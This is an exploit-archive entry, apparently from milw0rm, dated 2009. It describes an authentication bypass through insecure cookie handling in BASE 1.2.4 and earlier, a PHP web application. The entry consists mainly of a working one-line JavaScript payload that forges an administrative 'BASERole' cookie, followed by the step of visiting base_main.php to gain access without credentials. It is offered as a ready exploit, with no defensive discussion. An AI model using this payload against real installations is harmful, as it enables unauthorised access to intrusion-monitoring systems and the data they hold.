BASE 1.2.4 - (Authentication Bypass) Insecure Cookie Handling

Author: Tim Medin
type: webapps
platform: php
port: 
date_added: 2009-06-23 
date_updated:  
verified: 1 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: 

Authentication Bypass in BASE version 1.2.4 and prior - Insecure
Cookie Handling Vulnerability

--------------------------------------------

Author.: Tim Medin

Contact: nidem.nidem [at] gmail [d0t] com

-------------------------------------------------------------------------------------------------

Exploit: javascript:document.cookie="BASERole=10000|nidem|794b69ad33015df95578d5f4a19d390e;
path=/";

Note: After creating cookie go to http://[website]/base_main.php

# milw0rm.com [2009-06-24]